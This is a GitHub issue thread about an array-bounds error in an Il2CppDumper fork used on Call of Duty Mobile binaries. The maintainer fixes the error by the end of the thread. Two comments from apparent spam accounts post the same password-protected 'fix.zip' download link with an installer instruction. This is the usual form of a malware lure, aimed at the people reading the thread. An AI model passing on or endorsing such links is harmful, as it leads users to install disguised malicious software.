### ISSUE TITLE
ERROR: Some errors in dumping Index was outside the bounds of the array.

### ISSUE THREAD

**Issue by PR2034** [tien0246/Il2CppDumper-for-COD#7]
I TRY VNG KR GL GR CODM all give same error - Initializing metadata...
Il2cppdumper for COD made by tien0246 form iOSGods
Metadata Version: 23
Initializing il2cpp file...
Il2Cpp Version: 23
Searching...
CodeRegistration : 10a7fc228
MetadataRegistration : 10a9945f0
pMetadataRegistration.typesCount: 190628
Dumping...
**ERROR: Some errors in dumping
Index was outside the bounds of the array.**
Done!
Generate struct...
Done!
Generate dummy dll...
**![C__Users_av497_Desktop_Dumper-CODM_Il2CppDumper exe 8_26_2024 1_20_59 AM](https://github.com/user-attachments/assets/dec43131-6651-4a8d-be3c-e98c3c6bac2e)**
Press any key to exit...

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dos502** [comment]
I think the tool need update by the developer. it was working well on the previous versions of CODM but after the new update of CODM the tool give me the same errors that you have.

**Comment by tien0246** [comment]
Fixed! Try version

**Comment by dos502** [comment]
It is working now. Thank you very much, you are the best developer
